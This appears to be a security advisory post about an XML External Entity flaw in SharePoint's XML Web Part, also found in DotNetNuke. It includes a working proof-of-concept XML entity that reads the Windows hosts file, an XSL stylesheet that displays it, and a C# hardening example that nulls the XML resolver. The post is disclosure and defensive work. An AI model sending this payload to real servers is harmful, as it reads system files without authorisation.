Hello,

Microsoft recently published MS11-074. This bulletin mainly concerns SharePoint (2007 and 2010), but CVE-2011-1892 also applies to Office Groove (client and server), Office Forms Server 2007 and Office Web Apps 2010.

The vulnerability is an "XML External Entity Reference" one, as described in CWE-611 [1]. The vulnerable component is "XML Web Part" and the following image demonstrates the exploit on a SharePoint 2007 server [2].

DotNetNuke quietly patched a very similar vulnerability in its XML component this summer (v6.0.0 is OK [3]).

As described in Microsoft documentation [4], setting XmlReaderSettings::XmlResolver to NULL is enough to correct this bug.

Simple PoC for SharePoint and DotNetNuke:

-------------------------- XML ---------------------------------
<!DOCTYPE doc [
<!ENTITY boom SYSTEM "c:\\windows\\system32\\drivers\\etc\\hosts">
]>
<doc>&boom;</doc>
-----------------------------------------------------------------

-------------------------- XSL ----------------------------------
<xsl:stylesheet version="1.0"
    xmlns:xsl="http://www.w3.org/1999/XSL/Transform">
  <xsl:template match="/">
    <xsl:apply-templates/>
    <xsl:value-of select="doc"/>
  </xsl:template>
</xsl:stylesheet>
-----------------------------------------------------------------

More details, in French, on my blog: http://goo.gl/hptbj

1: http://cwe.mitre.org/data/definitions/611.html
2: http://www.agarri.fr/docs/shpt-xee.png
3: http://dnnxml.codeplex.com/releases/view/62862
4: http://msdn.microsoft.com/en-us/library/ms172415.aspx

Regards,
Nicolas Grégoire / Agarri
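
The mitigation cited from the Microsoft documentation (a null XmlResolver on XmlReaderSettings), applied to an XML-plus-XSL rendering path, as an added example that is not code from the original post, from SharePoint or from DotNetNuke. The class and method names are hypothetical, the entity target is a constructed placeholder path, and the DtdProcessing property assumes .NET Framework 4.0 or later.

```csharp
using System;
using System.IO;
using System.Xml;
using System.Xml.Xsl;

static class XmlWebPartHardeningDemo // hypothetical name, for illustration only
{
    // Constructed sample input: same shape as the PoC, placeholder entity target.
    const string Xml =
        "<!DOCTYPE doc [ <!ENTITY boom SYSTEM \"file:///C:/constructed/placeholder.txt\"> ]>" +
        "<doc>&boom;</doc>";
    const string Xsl =
        "<xsl:stylesheet version=\"1.0\" xmlns:xsl=\"http://www.w3.org/1999/XSL/Transform\">" +
        "<xsl:template match=\"/\"><xsl:value-of select=\"doc\"/></xsl:template>" +
        "</xsl:stylesheet>";

    // Reader for untrusted markup. With XmlResolver set to null the parser has
    // nothing to fetch external entities or an external DTD subset with.
    static XmlReader CreateReader(string text, bool allowDtd)
    {
        var settings = new XmlReaderSettings();
        settings.XmlResolver = null;
        // Prohibit rejects any DOCTYPE outright; Parse keeps internal DTDs usable.
        settings.DtdProcessing = allowDtd ? DtdProcessing.Parse : DtdProcessing.Prohibit;
        return XmlReader.Create(new StringReader(text), settings);
    }

    static string Render(bool allowDtd)
    {
        var transform = new XslCompiledTransform();
        // XsltSettings.Default leaves document() and script blocks disabled; the
        // null resolver also stops xsl:import / xsl:include from being fetched.
        using (var xslReader = CreateReader(Xsl, false))
            transform.Load(xslReader, XsltSettings.Default, null);
        try
        {
            using (var xmlReader = CreateReader(Xml, allowDtd))
            using (var output = new StringWriter())
            {
                transform.Transform(xmlReader, null, output);
                return output.ToString();
            }
        }
        catch (XmlException e) { return "rejected: " + e.Message; }
        catch (XsltException e) { return "rejected: " + e.Message; }
    }

    static void Main()
    {
        Console.WriteLine("DTD parsed, resolver null: [" + Render(true) + "]");
        Console.WriteLine("DTD prohibited:            [" + Render(false) + "]");
    }
}
```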